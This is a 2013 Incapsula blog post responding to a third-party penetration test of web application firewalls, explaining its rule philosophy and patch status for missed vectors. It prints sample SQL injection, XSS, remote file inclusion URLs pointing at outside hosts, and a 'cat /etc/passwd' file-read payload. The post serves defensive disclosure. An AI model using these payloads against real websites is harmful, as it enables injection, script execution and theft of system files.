25
Feb
2013

incapsula-pentested-review

A new comparative study was published last Wednesday by Zero Science Lab, an information security research laboratory that tested the security capabilities of our Web Application Firewall (WAF) together with 2 other vendors, TrustWave (ModSecurity) and CloudFlare.

The study focused on penetration testing of WAF security features and also addressed other factors, like pricing and user experience.

Incapsula scored high in all categories but the report also included some specific attack vectors that were not detected by our WAF and we wanted to address these further below. While at it, we also wanted to say something about our security philosophy and rule generation process.

Our Approach – Balancing Security and Usability

False positives are just as bad as false negatives (not detecting an attack). Beyond the immediate implications on website’s accessibility, false positives will also erode the overall effectiveness of all security measures. Simply put, false alerts will cause true alerts to be overlooked and inflexible features that block legitimate traffic will be eventually shut down.

Incapsula provides business oriented security services. Most of our clients operate commercial websites (eCommerce, SaaS providers, financial and corporate sites, etc.) and they rely on us to provide effective and non-intrusive security.

And so, when implementing new security rules, we follow these acceptance and maintenance principles:

1.Focus on real exploits: We want to provide practical solutions to real world issues. Some threats are mostly theoretical, others unpractical or outdated. When prioritizing tasks, this is a key consideration. (Read more here: Waf Definition - Mind the Gap)

2.Gradual and controlled implementation: Before implementation new security rules are activated in ‘Silent Mode’, where their would-be effects are tested on thousands of websites and millions of transactions. The results are monitored by our security team and fine-tuned until the number of false positives is reduced to a minimum.

3.Continuous monitoring and fine tuning: Our security team continuously analyses system reports that measure false positives rates for each security rule and applies changes to reduce them effectively.

We are always aware of the delicate balance between security and usability. Striking that balance helps us keep our clients safe and keep their business running.

Report Finding and Incapsula’s Remediation Measures:

Zero Science Lab report found several attack vectors that were not detected by our WAF. Some of these are oversights on our part. Few, we believe, are much more theoretical and dealing with them can cause more harm (false positives) than good.

With that in mind we want to thank Zero Science Lab for its contribution. This new data will help us make Incapsula a little bit better.

SQL Injections

/poc.php?Search2=joxy%27%20group%20by%20testzsl%20having%201=1`

Solution: Patched

XSS Vulnerabilities

/poc.php?x=%3C/h2%3E%3Cinput%20onfocus=prompt%28%27ZSL%27%29;%20autofocus%3E
  /poc.php?x=%3C/h2%3E%3Cbody%20oninput=alert%281%29%3E%3Cinput%20autofocus%3E

Solution: Partially Patched

Details: Event handling JavaScript code is very ubiquitous and can be observed in almost every web page. For example, these events are very commonly used for content editing by various plugins and CMSs. To minimize false positives, these security rules need to be delicately balanced. Our early tests have shown that indiscriminative JS event blocking rules would create hundreds of false positive occurrences in less than an hour. Currently a more lenient rule-set was introduced and we will continue to monitor the results.

/poc.php?x=%3C/h2%3E%3Cobject%20data=%22data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==%22%3E%3C/object%3E

Solution: Patched

Details: We have had a mitigating rule in Silent Mode for several months. During this period the rule spotted no security events but, at the same time, provided several false positives. Currently a more lenient version of the rule was promoted to production and we will continue monitoring it.

Remote File Inclusion

/poc.php?cmd2=http://google.com?

Solution:Partially Patched

Details: Our concern here is visitor repelling false positives, because legitimate URL addresses, which use aliases, will sometimes end with ‘?’ (i.e mydomain.com/how-to-tie-a-tie?). We are currently testing the remediating rule in Silent Mode and we will continue monitoring it before it is deployed.

/poc.php?cmd2=http://dni.destr0y.net/x.txt?
/poc.php?cmd2=http://96.8.122.139/x.php?????????

Solution:Patched

Details: Incapsula doesn’t offer generic RFI protection. Instead we prefer to maintain application specific rules, to deal with the much more common application related RFI vulnerabilities. While this was patched, we are aware that the implementation may lead to false positives when forced on applications that use URLs as values. We will continue to monitor the resulting events and modify the rules accordingly.

Local File Inclusion

/poc.php?cmd=cat%20\/etc\/passwd

Solution: Patched